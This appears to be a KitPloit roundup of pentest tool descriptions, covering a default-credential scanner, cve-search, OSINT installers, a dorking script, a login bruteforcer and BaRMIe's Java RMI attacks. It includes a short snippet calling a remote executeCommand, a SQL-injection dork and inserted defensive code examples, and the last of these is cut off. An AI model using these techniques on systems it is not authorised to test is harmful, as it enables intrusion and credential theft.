Channel: KitPloit - PenTest Tools!

changeme - A Default Credential Scanner


A default credential scanner.

About
Getting default credentials added to commercial scanners is often difficult and slow. changeme is designed to make adding new credentials simple, without having to write any code or modules.
changeme keeps credential data separate from code. All credentials are stored in YAML files so they can be both easily read by humans and processed by changeme. Credential files can be created with the ./changeme.py --mkcred tool by answering a few questions.
changeme supports the http/https, mssql, mysql, postgres, ssh, ssh w/key, snmp, mongodb and ftp protocols. Use ./changeme.py --dump to output all of the currently available credentials.
You can load your targets using a variety of methods: a single IP address/host, a subnet, a list of hosts, an nmap XML file or a Shodan query. All methods except Shodan are loaded as a positional argument and the type is inferred.

Installation
changeme has only been tested on Linux and has known issues on Windows and OS X/macOS. Use docker to run changeme on the unsupported platforms.
Stable versions of changeme can be found on the releases page.
For mssql support, unixodbc-dev needs to be installed prior to installing pyodbc.
PhantomJS is required in your PATH for HTML report screenshots.
Use pip to install the required python modules: pip install -r requirements.txt

Docker
A convenient way of running changeme is to do so inside a Docker container. You can run a pre-built container from Docker Hub, or build your own using the instructions below.

Run changeme in Docker
  1. Download the container: docker pull ztgrace/changeme
  2. Run the container: docker run -it ztgrace/changeme /bin/bash

Build from Dockerfile
  1. Build the docker container: docker build -t changeme .
  2. Run changeme from inside the container: docker run -it changeme /bin/bash

Usage Examples
Below are some common usage examples.
  • Scan a single host: ./changeme.py 192.168.59.100
  • Scan a subnet for default creds: ./changeme.py 192.168.59.0/24
  • Scan using an nmap file: ./changeme.py subnet.xml
  • Scan a subnet for Tomcat default creds and set the timeout to 5 seconds: ./changeme.py -s 192.168.59.0/24 -n "Apache Tomcat" --timeout 5
  • Use Shodan to populate a targets list and check them for default credentials: ./changeme.py --shodan_query "Server: SQ-WEBCAM" --shodan_key keygoeshere -c camera
  • Scan for SSH and known SSH keys: ./changeme.py 192.168.59.0/24 --protocols ssh,ssh_key
  • Scan a host for SNMP creds using the protocol syntax: ./changeme.py snmp://192.168.1.20


CyberScan - Tool To Analyse Packets, Decoding , Scanning Ports, And Geolocation


CyberScan is an open source penetration testing tool that can analyse packets, decode them, scan ports, ping hosts and geolocate an IP address (latitude, longitude, region, country, ...).



Operating Systems Supported
  • Windows XP/7/8/8.1/10
  • GNU/Linux
  • MacOSX

Installation
You can download CyberScan by cloning the Git repository:
git clone https://github.com/medbenali/CyberScan.git
cd CyberScan/
python CyberScan.py -v
CyberScan works out of the box with Python version 2.6.x and 2.7.x.


cve-search - A Tool To Perform Local Searches For Known Vulnerabilities



cve-search is a tool to import CVE (Common Vulnerabilities and Exposures) and CPE (Common Platform Enumeration) into a MongoDB to facilitate search and processing of CVEs.
The main objective of the software is to avoid direct lookups against the public CVE databases. Local lookups are usually faster and limit the sensitive queries you send over the Internet.
cve-search includes a back-end to store vulnerabilities and related information, an intuitive web interface for search and managing vulnerabilities, a series of tools to query the system and a web API interface.
cve-search is used by many organizations including the public CVE services of CIRCL.

Requirements
The requirements can be installed with pip:
sudo pip3 install -r requirements.txt

Installation of MongoDB
First, you'll need a Python 3 installation (3.3 or higher). Then you need to install MongoDB (2.2) from source (this should also work with any standard packages from your favorite distribution). Don't forget to install the development headers while installing MongoDB. Go to http://docs.mongodb.org/manual/installation/ to get the packages for your distribution, or to http://www.mongodb.org/downloads for the source code.

Populating the database
For the initial run, you need to populate the CVE database by running:
./sbin/db_mgmt.py -p
./sbin/db_mgmt_cpe_dictionary.py
./sbin/db_updater.py -c
It will fetch all the existing XML files from the Common Vulnerabilities and Exposures database and the Common Platform Enumeration. The initial Common Platform Enumeration (CPE) import might take some time depending on your configuration.
If you want to add the cross-references from NIST, Red Hat and other vendors:
./sbin/db_mgmt_ref.py
More detailed documentation can be found in the Documentations folder of the project.

Databases and collections
The MongoDB database is called cvedb and there are 11 collections:
  • cves (Common Vulnerabilities and Exposure items) - source NVD NIST
  • cpe (Common Platform Enumeration items) - source NVD NIST
  • cwe (Common Weakness Enumeration items) - source NVD NIST
  • capec (Common Attack Pattern Enumeration and Classification) - source NVD NIST
  • ranking (ranking rules per group) - local cve-search
  • d2sec (Exploitation reference from D2 Elliot Web Exploitation Framework) - source d2sec.com
  • MITRE Reference Key/Maps - source MITRE reference Key/Maps
  • ms - (Microsoft Bulletin (Security Vulnerabilities and Bulletin)) - source Microsoft
  • exploitdb (Offensive Security - Exploit Database) - source offensive security
  • info (metadata of each collection like last-modified) - local cve-search
  • via4 (VIA4CVE cross-references)
Redis holds 3 databases:
  • 10: The cpe (Common Platform Enumeration) cache - source MongoDB cvedb collection cpe
  • 11: The notification database - source cve-search
  • 12: The CVE reference database is a cross-reference database to CVE ids against various vendors ID - source NVD NIST/MITRE
The reference database has 3 additional sources:

Updating the database
An updater script runs the db_mgmt_* scripts for you:
./sbin/db_updater.py -v
You can run it in a crontab, logging is done in syslog by default.

Repopulating the database
To easily drop and re-populate all the databases:
./sbin/db_updater.py -v -f
This will drop all the existing external sources and reimport everything. This operation can take some time and is usually only required when parsing of new attributes is added to cve-search.

Usage
You can search the database using search.py:
./bin/search.py -p cisco:ios:12.4
./bin/search.py -p cisco:ios:12.4 -o json
./bin/search.py -f nagios -n
./bin/search.py -p microsoft:windows_7 -o html
To search all the WebEx vulnerabilities and print only the official references from the vendor:
./bin/search.py -p webex: -o csv  -v "cisco"
You can also dump the JSON for a specific CVE ID:
./bin/search.py -c CVE-2010-3333
Or you can use the XMPP bot:
./bin/search_xmpp.py -j mybot@jabber.org -p strongpassword
Or dump the last 2 CVE entries in RSS or Atom format:
./bin/dump_last.py -f atom -l 2
Or you can use the web interface:
./web/index.py

Usage of the ranking database
There is a ranking database that allows you to rank software vulnerabilities based on their Common Platform Enumeration name. The ranking can be done per organization, per department within your organization, or under any name meaningful to you.
As an example, you can add a partial CPE name like "sap:netweaver" which is very critical for your accounting department.
./sbin/db_ranking.py  -c "sap:netweaver" -g "accounting" -r 3
and then you can look up the ranking (-r option) for a specific CVE-ID:
./bin/search.py -c CVE-2012-4341  -r  -n

Advanced usage
As cve-search is based on a set of tools, it can be used and combined with standard Unix tools. If you ever wonder which vendors most often use the term "unknown" for their vulnerabilities:
python3 bin/search_fulltext.py -q unknown -f | jq -c '. | .vulnerable_configuration[0]' | cut -f5 -d: | sort  | uniq -c  | sort -nr | head -10

1500 oracle
381 sun
372 hp
232 google
208 ibm
126 mozilla
103 microsoft
100 adobe
78 apple
68 linux
You can compare CVSS (Common Vulnerability Scoring System) values of some products based on their CPE name, for example comparing oracle:java versus sun:jre and using R to compute some statistics about their CVSS values:
python3 bin/search.py -p oracle:java -o json  | jq -r '.cvss' | Rscript -e 'summary(as.numeric(read.table(file("stdin"))[,1]))'
Min. 1st Qu. Median Mean 3rd Qu. Max.
1.800 5.350 9.300 7.832 10.000 10.000


python3 bin/search.py -p sun:jre -o json | jq -r '.cvss' | Rscript -e 'summary(as.numeric(read.table(file("stdin"))[,1]))'
Min. 1st Qu. Median Mean 3rd Qu. Max.
0.000 5.000 7.500 7.333 10.000 10.000
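The same two analyses (top vendors taken from the first vulnerable_configuration entry, and an R-style five-number CVSS summary) done in Python instead of jq, cut and Rscript. This is an added example, not part of cve-search; it assumes search.py -o json emits one JSON object per line carrying the id, cvss and vulnerable_configuration fields shown on this page, and the sample records are constructed from the zyxel API output below. It goes slightly beyond the pipeline above in also accepting CPE 2.3 formatted strings and records without a CVSS score.

```python
"""Post-process cve-search JSON records without jq or R (added example)."""
import json
import statistics
from collections import Counter

# Constructed sample: one record per line, modelled on the search.py -o json
# shape. CVE ids, scores and CPEs are taken from the zyxel output on this
# page; the last record is a constructed CPE 2.3 variant with no cvss field.
SAMPLE = "\n".join(json.dumps(r) for r in [
    {"id": "CVE-2014-4162", "cvss": 6.8,
     "vulnerable_configuration": ["cpe:/h:zyxel:p-660hw:_t1:v3"]},
    {"id": "CVE-2013-3588", "cvss": 7.8,
     "vulnerable_configuration": ["cpe:/h:zyxel:p-660h-63:-", "cpe:/h:zyxel:p-660h-t1:-"]},
    {"id": "CVE-2013-6786", "cvss": 4.3,
     "vulnerable_configuration": ["cpe:/h:d-link:dsl-2640r:-", "cpe:/h:zyxel:p-660hw_d1:-"]},
    {"id": "CVE-2008-1257", "cvss": 4.3,
     "vulnerable_configuration": ["cpe:/h:zyxel:p-660hw_t3:v2"]},
    {"id": "CVE-2008-1256", "cvss": 10.0,
     "vulnerable_configuration": ["cpe:/h:zyxel:p-660hw"]},
    {"id": "CVE-2008-1255", "cvss": 10.0,
     "vulnerable_configuration": ["cpe:/h:zyxel:p-660hw"]},
    {"id": "CVE-2008-1254", "cvss": 6.8,
     "vulnerable_configuration": ["cpe:/h:zyxel:p-660hw"]},
    {"id": "CVE-XXXX-PLACEHOLDER", "cvss": None,   # constructed record
     "vulnerable_configuration": ["cpe:2.3:a:allegrosoft:rompager:4.07:*:*:*:*:*:*:*"]},
])


def cpe_vendor(cpe):
    """Vendor component of a CPE 2.2 URI ('cpe:/h:vendor:product:...')
    or a CPE 2.3 formatted string ('cpe:2.3:h:vendor:product:...')."""
    parts = cpe.split(":")
    if len(parts) >= 4 and parts[1].startswith("/"):
        return parts[2]                      # cpe:/<part>:<vendor>:<product>
    if len(parts) >= 5 and parts[1] == "2.3":
        return parts[3]                      # cpe:2.3:<part>:<vendor>:<product>
    raise ValueError("unrecognised CPE name: %r" % cpe)


def load_records(text):
    """Parse line-delimited JSON as emitted by search.py -o json."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def top_vendors(records, limit=10):
    """Count the vendor of the first vulnerable_configuration entry per CVE,
    mirroring `jq '.vulnerable_configuration[0]' | cut | sort | uniq -c`."""
    counts = Counter()
    for rec in records:
        confs = rec.get("vulnerable_configuration") or []
        if not confs:
            continue
        first = confs[0]
        if isinstance(first, dict):          # some releases wrap CPEs as {"id": ...}
            first = first.get("id", "")
        counts[cpe_vendor(first)] += 1
    return counts.most_common(limit)


def cvss_summary(records):
    """Min, quartiles, median, mean and max of the cvss field, using the same
    quantile definition as R's summary() (type 7). Records without a score
    are skipped rather than counted as zero."""
    scores = sorted(float(r["cvss"]) for r in records if r.get("cvss") is not None)
    if not scores:
        raise ValueError("no CVSS scores in input")
    q1, median, q3 = statistics.quantiles(scores, n=4, method="inclusive")
    return {"min": scores[0], "q1": q1, "median": median,
            "mean": statistics.fmean(scores), "q3": q3, "max": scores[-1]}


if __name__ == "__main__":
    recs = load_records(SAMPLE)
    for vendor, n in top_vendors(recs):
        print("%4d %s" % (n, vendor))
    summary = cvss_summary(recs)
    print("Min. 1st Qu. Median Mean 3rd Qu. Max.")
    print("%.3f %.3f %.3f %.3f %.3f %.3f" % (summary["min"], summary["q1"],
          summary["median"], summary["mean"], summary["q3"], summary["max"]))
```

Feed real output with `python3 bin/search.py -p oracle:java -o json | python3 cvss_stats.py` after replacing SAMPLE with `sys.stdin.read()`.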

Fulltext indexing
If you want to index all the CVEs from your current MongoDB collection:
./sbin/db_fulltext.py
and you query the fulltext index (to get a list of matching CVE-ID):
./bin/search_fulltext.py -q NFS -q Linux
or to query the fulltext index and output the JSON object for each CVE-ID:
./bin/search_fulltext.py -q NFS -q Linux -f

Fulltext visualization
The fulltext indexer visualization uses the fulltext indexes to build a list of the most common keywords used in CVEs. NLTK is required to generate the keywords, remove the most common English stopwords and lemmatize the output. NLTK for Python 3 exists but you need to use the alpha version of NLTK.
./bin/search_fulltext.py  -g -s >cve.json


You can see a visualization on the demo site.

Web interface
The web interface is a minimal interface to see the latest CVE entries and query a specific CVE. You'll need Flask and Flask-PyMongo in order to run the website. To start the web interface:
cd ./web
./index.py
Then you can connect to http://127.0.0.1:5000/ to browse the latest CVEs.

Web API interface
The web interface includes a minimal JSON API to get CVEs by ID, by vendor or by product. A public version of the API is also accessible on cve.circl.lu.
List the known vendors in JSON:
curl http://127.0.0.1:5000/api/browse/
Dump the products of a specific vendor in JSON:
curl http://127.0.0.1:5000/api/browse/zyxel
{
"product": [
"n300_netusb_nbg-419n",
"n300_netusb_nbg-419n_firmware",
"p-660h-61",
"p-660h-63",
"p-660h-67",
"p-660h-d1",
"p-660h-d3",
"p-660h-t1",
"p-660h-t3",
"p-660hw",
"p-660hw_d1",
"p-660hw_d3",
"p-660hw_t3"
],
"vendor": "zyxel"
}
Find the vulnerabilities associated with a vendor and a product:
curl  http://127.0.0.1:5000/api/search/zyxel/p-660hw
[{"cwe": "CWE-352", "references": ["http://www.exploit-db.com/exploits/33518", "http://secunia.com/advisories/58513", "http://packetstormsecurity.com/files/126812/Zyxel-P-660HW-T1-Cross-Site-Request-Forgery.html", "http://osvdb.org/show/osvdb/107449"], "vulnerable_configuration": ["cpe:/h:zyxel:p-660hw:_t1:v3"], "Published": "2014-06-16T14:55:09.713-04:00", "id": "CVE-2014-4162", "Modified": "2014-07-17T01:07:29.683-04:00", "cvss": 6.8, "summary": "Multiple cross-site request forgery (CSRF) vulnerabilities in the Zyxel P-660HW-T1 (v3) wireless router allow remote attackers to hijack the authentication of administrators for requests that change the (1) wifi password or (2) SSID via a request to Forms/WLAN_General_1."}, {"cwe": "CWE-20", "references": ["http://www.kb.cert.org/vuls/id/893726"], "vulnerable_configuration": ["cpe:/h:zyxel:p-660h-63:-", "cpe:/h:zyxel:p-660h-t1:-", "cpe:/h:zyxel:p-660h-d3:-", "cpe:/h:zyxel:p-660h-t3:v2", "cpe:/h:zyxel:p-660h-t1:v2", "cpe:/h:zyxel:p-660h-d1:-", "cpe:/h:zyxel:p-660h-67:-", "cpe:/h:zyxel:p-660h-61:-", "cpe:/h:zyxel:p-660hw_t3:v2", "cpe:/h:zyxel:p-660hw_t3:-", "cpe:/h:zyxel:p-660hw_d3:-", "cpe:/h:zyxel:p-660hw_d1:v2", "cpe:/h:zyxel:p-660hw_d1:-", "cpe:/h:zyxel:p-660hw:_t1:v2", "cpe:/h:zyxel:p-660hw:_t1:-"], "Published": "2014-04-01T23:58:16.967-04:00", "id": "CVE-2013-3588", "Modified": "2014-04-02T11:29:53.243-04:00", "cvss": 7.8, "summary": "The web management interface on Zyxel P660 devices allows remote attackers to cause a denial of service (reboot) via a flood of TCP SYN packets."}, {"cwe": "CWE-79", "references": ["http://osvdb.org/ref/99/rompager407.pdf", "http://osvdb.org/99694", "http://antoniovazquezblanco.github.io/docs/advisories/Advisory_RomPagerXSS.pdf"], "vulnerable_configuration": ["cpe:/h:d-link:dsl-2640r:-", "cpe:/h:d-link:dsl-2641r:-", "cpe:/h:huawei:mt882:-", "cpe:/h:sitecom:wl-174:-", "cpe:/h:tp-link:td-8816:-", "cpe:/a:allegrosoft:rompager:4.07", "cpe:/h:zyxel:p-660hw_d1:-"], "Published": 
"2014-01-16T14:55:04.607-05:00", "id": "CVE-2013-6786", "Modified": "2014-01-17T11:01:47.353-05:00", "cvss": 4.3, "summary": "Cross-site scripting (XSS) vulnerability in Allegro RomPager before 4.51, as used on the ZyXEL P660HW-D1, Huawei MT882, Sitecom WL-174, TP-LINK TD-8816, and D-Link DSL-2640R and DSL-2641R, when the \"forbidden author header\" protection mechanism is bypassed, allows remote attackers to inject arbitrary web script or HTML by requesting a nonexistent URI in conjunction with a crafted HTTP Referer header that is not properly handled in a 404 page. NOTE: there is no CVE for a \"URL redirection\" issue that some sources list separately."}, {"cwe": "CWE-79", "references": ["http://xforce.iss.net/xforce/xfdb/41109", "http://www.securityfocus.com/archive/1/archive/1/489009/100/0/threaded", "http://www.gnucitizen.org/projects/router-hacking-challenge/"], "vulnerable_configuration": ["cpe:/h:zyxel:p-660hw_t3:v2", "cpe:/h:zyxel:p-660hw:_t1:v2", "cpe:/h:zyxel:p-660hw_d1:v2", "cpe:/h:zyxel:p-660hw_t3:-", "cpe:/h:zyxel:p-660hw:_t1:-", "cpe:/h:zyxel:p-660hw_d3:-", "cpe:/h:zyxel:p-660hw_d1:-"], "Published": "2008-03-10T13:44:00.000-04:00", "id": "CVE-2008-1257", "Modified": "2012-05-31T00:00:00.000-04:00", "cvss": 4.3, "summary": "Cross-site scripting (XSS) vulnerability in Forms/DiagGeneral_2 on the ZyXEL P-660HW series router allows remote attackers to inject arbitrary web script or HTML via the PingIPAddr parameter."}, {"id": "CVE-2008-1256", "references": ["http://xforce.iss.net/xforce/xfdb/41108", "http://www.securityfocus.com/archive/1/archive/1/489009/100/0/threaded", "http://www.gnucitizen.org/projects/router-hacking-challenge/"], "vulnerable_configuration": ["cpe:/h:zyxel:p-660hw"], "Published": "2008-03-10T13:44:00.000-04:00", "Modified": "2011-03-07T22:06:25.080-05:00", "cvss": 10.0, "summary": "The ZyXEL P-660HW series router has \"admin\" as its default password, which allows remote attackers to gain administrative access."}, {"cwe": "CWE-264", 
"references": ["http://www.securityfocus.com/archive/1/archive/1/489009/100/0/threaded", "http://www.gnucitizen.org/projects/router-hacking-challenge/", "http://xforce.iss.net/xforce/xfdb/41114"], "vulnerable_configuration": ["cpe:/h:zyxel:p-660hw"], "Published": "2008-03-10T13:44:00.000-04:00", "id": "CVE-2008-1255", "Modified": "2008-09-05T17:37:15.440-04:00", "cvss": 10.0, "summary": "The ZyXEL P-660HW series router maintains authentication state by IP address, which allows remote attackers to bypass authentication by establishing a session from a source IP address of a previously authenticated user."}, {"cwe": "CWE-352", "references": ["http://www.securityfocus.com/archive/1/archive/1/489009/100/0/threaded", "http://www.gnucitizen.org/projects/router-hacking-challenge/", "http://xforce.iss.net/xforce/xfdb/41111"], "vulnerable_configuration": ["cpe:/h:zyxel:p-660hw"], "Published": "2008-03-10T13:44:00.000-04:00", "id": "CVE-2008-1254", "Modified": "2008-09-05T17:37:15.287-04:00", "cvss": 6.8, "summary": "Multiple cross-site request forgery (CSRF) vulnerabilities on the ZyXEL P-660HW series router allow remote attackers to (1) change DNS servers and (2) add keywords to the \"bannedlist\" via unspecified vectors."}]

Software using cve-search

IntRec-Pack - Intelligence and Reconnaissance Package/Bundle installer


Intelligence and Reconnaissance Package/Bundle installer.
IntRec-Pack is a Bash script designed to download, install and deploy several quality OSINT, Recon and Threat Intelligence tools. Because it also manages the installation of the various dependencies these programs need, it aims to be a comprehensive assistant for setting up your intelligence gathering environment. Below is an overview of the tools and utilities it will help you set up.

+-----------------------+-------------------------------------------+
| Tool                  | Utility type and feature summary          |
+-----------------------+-------------------------------------------+
|1. QuickScan           | Port Scanner/WHOIS/Domain Resolver        |
|2. DNSRecon            | Advanced DNS Enumeration & Domain Utility |
|3. Sublist3r           | OSINT Based Subdomain Enumeration         |
|4. TekDefense-Automator| OSINT Based IP, URL and Hash Analyzer     |
|5. TheHarvester        | eMail, vHost, Domain and PII Enumeration  |
|6. IOC-Parser          | Threat Intel, parses IOC data from reports|
|7. PyParser-CVE        | Multi Source Exploit Parser/CVE Lookup    |
|8. Mimir               | HoneyDB CLI/Threat Intelligence Utility   |
|9. Harbinger           | Cymon.io, Virus Total, Threat Feed Parser |
|10.Spiderfoot          | Advanced OSINT/Reconnaissance Framework   |
+-----------------------+-------------------------------------------+
Furthermore, I have included functionality within the Bash script that lets the user easily pull up two web based resources, namely OSINT-Framework and HoneyDB. The former is a curated list of open source intelligence tools, websites and related materials for use as a reference guide. The latter is an aggregated OSINT threat intelligence pool that collects and organizes data provided by HoneyPy honeypots; my command line interface for it (Mimir) is included in the selection of tools available for download with IntRec-Pack as well.

Usage
Clone the tool from the repo and make it executable like so.
git clone https://github.com/NullArray/IntRec-Pack.git
cd IntRec-Pack
chmod +x intrec.sh
After that it can be started from the command line with sudo ./intrec.sh. Upon doing so you will be presented with a menu whose options are as follows:
1) Help                  4) Specify Install Location
2) List and Install      5) Online Resources
3) Install All           6) Quit
The help option displays further usage information and general details about the tool. List and Install lists all the tools available for download/installation and lets you select the ones you would like; the selected tools plus their dependencies are then installed in the current working directory, unless the Specify Install Location option has been used to provide a path to a custom location. Install All downloads and installs all the tools available with this script, and Online Resources opens the web applications previously mentioned.

Update
The script has been updated to version 1.0.1.

Changelog
Each installation operation now has its own function in order to make the script modular. This will also allow the easy addition of operations that install other tools in the future.
Additional checks have been added to the script to look for the presence of utilities such as wget, git and pip. This is important because some distros such as Debian and Devuan do not ship some of these utilities by default. Should the script find any of these utilities missing, it will attempt to resolve the issue automatically, making the script effective and compatible with most Debian based distros.
From now on IntRec-Pack will check whether it has been started with superuser privileges. Since there are a lot of sudo commands in the script, this prevents the user from running into trouble halfway through the execution.


DorkNet - Selenium Powered Python Script To Automate Searching For Vulnerable Web Apps


Selenium powered Python script to automate searching the web for vulnerable applications.
DorkNet can take a single dork or a list of dorks as arguments. After the proper command line arguments have been passed, the script uses Selenium and Geckodriver to find the results and saves them to a text file for further processing with SQLmap or similar utilities.

Usage
git clone https://github.com/NullArray/DorkNet.git
cd DorkNet
python dorknet.py
The options for the program are as follows:
-h, --help              show this help message and exit
-d DORK, --dork DORK    specify the dork you wish to use
-l LIST, --list LIST    specify path to list with dorks
-v, --verbose           toggle verbosity
Some examples for clarity:
DorkNet.py -h
DorkNet.py -d inurl:show.php?id= -v
DorkNet.py -l /path/to/list.txt --verbose

Dependencies
You will need the Mozilla Geckodriver for this to work. After it has been installed, install the Python dependencies from the requirements file I made for this program:
pip install -r requirements.txt

Known Issue
By using Selenium and Geckodriver, DorkNet is effective at emulating a regular browser. In this manner the program is able to avoid captchas most of the time. However, on limited occasions Google throws one regardless; the same sometimes happens when manually searching for strings that look like a dork. Should you encounter one, you can just fill out the captcha in the Geckodriver window and DorkNet will continue its normal operation.


EllaScanner - Passive Web Scanner


Passive web scanner.

EllaScanner is a simple passive web scanner. Using this tool you can quickly check your site's security state.
Usage:
./Start.py https:// or http://

Scanning a site consists of several phases:
In the first phase, you get recommendations related to the HTTP/HTTPS headers.
The second phase depends on the information gathered in the first phase: you get CVEs related to the server's version.

After this, the scanner queries sucuri.net and prints information about defacements, malicious code, etc.
And last but not least, if the site is Georgian you can get information from checknet.ge about the site's historical states.

Installation
pip install -r requirements.txt
./Start.py



Blazy - Modern Login Bruteforcer Which Also Tests For CSRF, Clickjacking, Cloudflare and WAF


Blazy is a modern login page bruteforcer.


Features
  • Easy target selections
  • Smart form and error detection
  • CSRF and Clickjacking Scanner
  • Cloudflare and WAF Detector
  • 90% accurate results
  • Checks for login bypass via SQL injection
  • Multi-threading
  • 100% accurate results
  • Better form detection and compatibility

Requirements
  • Beautiful Soup
  • Mechanize

Usage
Open your terminal and enter
git clone https://github.com/UltimateHackers/Blazy
Now enter the following command
cd Blazy
Let's install the required modules before running Blazy
pip install -r requirements.txt
Now run Blazy by entering
python blazy.py

Now enter your desired login page URL and Blazy will do its thing:


BaRMIe - Java RMI Enumeration And Attack Tool


BaRMIe is a tool for enumerating and attacking Java RMI (Remote Method Invocation) services.
RMI services often expose dangerous functionality without adequate security controls; however, RMI services tend to pass under the radar during security assessments because of the lack of effective testing tools. In 2008 Adam Boulton spoke at AppSec USA (YouTube) and released some RMI attack tools which disappeared soon after, but even with those tools a successful zero-knowledge attack relies on a significant brute force attack (~64 bits, 9 quintillion possibilities) being performed over the network.
The goal of BaRMIe is to enable security professionals to identify, attack, and secure insecure RMI services. Using partial RMI interfaces from existing software, BaRMIe can interact directly with those services without first brute forcing 64-bits over the network.

Disclaimer
BaRMIe was written to aid security professionals in identifying insecure RMI services on systems which the user has prior permission to attack. Unauthorised access to computer systems is illegal and BaRMIe must be used in accordance with all relevant laws. Failure to do so could lead to you being prosecuted. The developers of BaRMIe assume no liability and are not responsible for any misuse or damage caused by this program.

Usage
Use of BaRMIe is straightforward. Run BaRMIe with no parameters for usage information.
$ java -jar BaRMIe.jar
(BaRMIe ASCII art banner) v1.0
Java RMI enumeration tool.
Written by Nicky Bloor (@NickstaDB)

Warning: BaRMIe was written to aid security professionals in identifying the
insecure use of RMI services on systems which the user has prior
permission to attack. BaRMIe must be used in accordance with all
relevant laws. Failure to do so could lead to your prosecution.
The developers assume no liability and are not responsible for any
misuse or damage caused by this program.

Usage:
  BaRMIe -enum [options] [host] [port]
    Enumerate RMI services on the given endpoint(s).
    Note: if -enum is not specified, this is the default mode.
  BaRMIe -attack [options] [host] [port]
    Enumerate and attack the given target(s).
Options:
  --threads   The number of threads to use for enumeration (default 10).
  --timeout   The timeout for blocking socket operations (default 5,000ms).
  --targets   A file containing targets to scan.
              The file should contain a single host or space-separated
              host and port pair per line.
              Alternatively, all nmap output formats are supported, BaRMIe will
              parse nmap output for port 1099, 'rmiregistry', or 'Java RMI'
              services to target.
              Note: [host] [port] not supported when --targets is used.
Reliability:
  A +/- system is used to indicate attack reliability as follows:
    [+  ]: Indicates an application-specific attack
    [-  ]: Indicates a JRE attack
    [ + ]: Attack insecure methods (such as 'writeFile' without auth)
    [ - ]: Attack Java deserialization (i.e. Object parameters)
    [  +]: Does not require non-default dependencies
    [  -]: Non-default dependencies are required
Enumeration mode (-enum) extracts details of objects that are exposed through an RMI registry service and lists any known attacks that affect the endpoint.
Attack mode (-attack) first enumerates the given targets, then provides a menu system for launching known attacks against RMI services.
A single target can be specified on the command line. Alternatively BaRMIe can extract targets from a simple text file or nmap output.

No Vulnerable Targets Identified?
Great! This is your opportunity to help improve BaRMIe! BaRMIe relies on some knowledge of the classes exposed over RMI so contributions will go a long way in improving BaRMIe and the security of RMI services.
If you have access to JAR files or source code for the target application then producing an attack is as simple as compiling code against the relevant JAR files. Retrieve the relevant remote object using the LocateRegistry and Registry classes and call the desired methods. Alternatively look for remote methods that accept arbitrary objects or otherwise non-primitive parameters as these can be used to deliver deserialization payloads. More documentation on attacking RMI and producing attacks for BaRMIe will be made available in the near future.
Alternatively, get in touch, and provide as much detail as possible including BaRMIe -enum output and ideally the relevant JAR files.

Attack Types
BaRMIe is capable of performing three types of attacks against RMI services. A brief description of each follows. Further technical details will be published in the near future at https://nickbloor.co.uk/. In addition to this, I presented the results of my research at 44CON 2017 and the slides can be found here: BaRMIe - Poking Java's Back Door.

1. Attacking Insecure Methods
The first and most straightforward method of attacking insecure RMI services is to simply call insecure remote methods. Often dangerous functionality is exposed over RMI which can be triggered by simply retrieving the remote object reference and calling the dangerous method. The following code is an example of this:
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

//Get a reference to the remote RMI registry service
Registry reg = LocateRegistry.getRegistry(targetHost, targetPort);

//Get a reference to the target RMI object (Foo is the service's remote interface)
Foo bar = (Foo)reg.lookup(objectName);

//Call the remote executeCommand() method
bar.executeCommand(cmd);

2. Deserialization via Object-type Parameters
Some RMI services do not expose dangerous functionality, or they implement security controls such as authentication and session management. If the RMI service exposes a method that accepts an arbitrary Object as a parameter then the method can be used as an entry point for deserialization attacks. Some examples of such methods can be seen below:
public void setOption(String name, Object value);
public void addAll(List values);

3. Deserialization via Illegal Method Invocation
Due to the use of serialization, and insecure handling of method parameters on the server, it is possible to use any method with non-primitive parameter types as an entry point for deserialization attacks. BaRMIe achieves this by using TCP proxies to modify method parameters at the network level, essentially triggering illegal method invocations. Some examples of vulnerable methods can be seen below:
public void setName(String name);
public Long add(Integer i1, Integer i2);
public void sum(int[] values);
The parameters to each of these methods can be replaced with a deserialization payload as the method invocation passes through a proxy. This attack is possible because Java does not attempt to verify that remote method parameters received over the network are compatible with the actual parameter types before deserializing them.
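The server-side counterpart to attack types 2 and 3, as an added defender's example that is not part of BaRMIe or of the original post: a Java 17+ RMI server exporting the `add(Integer, Integer)` signature listed above with a per-object `ObjectInputFilter`, so that an argument replaced on the wire with a class the signature never uses is rejected before it is deserialized, which is exactly the type check the last paragraph says Java does not perform. The `Calc` interface, class names and registry port are assumptions.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.rmi.Remote;
import java.rmi.RemoteException;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import java.rmi.server.UnicastRemoteObject;

// Hypothetical remote interface carrying the add(Integer, Integer) signature
// the text lists as an entry point for attack type 3.
interface Calc extends Remote {
    Long add(Integer i1, Integer i2) throws RemoteException;
}

public class FilteredRmiServer implements Calc {

    // Allow-list filter: only the classes add()'s arguments can legitimately
    // contain (Integer and its serializable superclass Number). "!*" rejects
    // every other class and maxdepth bounds object graph nesting, so a
    // parameter swapped for a gadget graph is refused by the stream itself
    // rather than being deserialized and only then failing the cast.
    static final ObjectInputFilter ARG_FILTER = ObjectInputFilter.Config.createFilter(
            "maxdepth=2;java.lang.Integer;java.lang.Number;!*");

    @Override
    public Long add(Integer i1, Integer i2) {
        return (long) i1 + i2;
    }

    // Deserialize bytes under ARG_FILTER: true if the filter let the object
    // through, false if it was rejected (InvalidClassException).
    static boolean acceptedByFilter(byte[] serialized) throws Exception {
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(serialized))) {
            in.setObjectInputFilter(ARG_FILTER);
            in.readObject();
            return true;
        } catch (InvalidClassException rejected) {
            return false;
        }
    }

    static byte[] serialize(Object o) throws Exception {
        ByteArrayOutputStream bytes = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(bytes)) {
            out.writeObject(o);
        }
        return bytes.toByteArray();
    }

    public static void main(String[] args) throws Exception {
        // Java 17+: export with a per-object filter that is applied to the
        // arguments of every incoming call to this object.
        FilteredRmiServer impl = new FilteredRmiServer();
        Calc stub = (Calc) UnicastRemoteObject.exportObject(impl, 0, ARG_FILTER);
        Registry registry = LocateRegistry.createRegistry(1099);   // port is an assumption
        registry.rebind("calc", stub);

        // Legitimate call over loopback: Integer arguments pass the filter.
        Calc client = (Calc) LocateRegistry.getRegistry("127.0.0.1", 1099).lookup("calc");
        System.out.println("2 + 3 = " + client.add(2, 3));

        // The typed stub cannot send a wrong-typed argument, so the filter's
        // decision is shown directly on serialized forms instead.
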